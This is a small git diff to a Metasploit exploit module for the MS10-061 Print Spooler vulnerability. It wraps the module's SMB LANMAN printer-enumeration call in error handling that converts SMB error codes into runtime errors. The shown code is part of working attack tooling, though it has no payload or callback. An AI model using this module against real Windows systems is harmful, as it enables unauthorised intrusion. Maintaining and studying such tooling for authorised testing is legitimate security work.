diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index 852f4933d2..3195a78af5 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -95,15 +95,19 @@ class Metasploit3 < Msf::Exploit::Remote if (pname = datastore['PNAME']) printers << pname else - res = self.simple.client.trans( - "\\PIPE\\LANMAN", - ( - [0x00].pack('v') + - "WrLeh\x00" + - "B13BWz\x00" + - [0x01, 65406].pack("vv") + begin + res = self.simple.client.trans( + "\\PIPE\\LANMAN", + ( + [0x00].pack('v') + + "WrLeh\x00" + + "B13BWz\x00" + + [0x01, 65406].pack("vv") + ) ) - ) + rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e + raise RuntimeError, e.message + end printers = []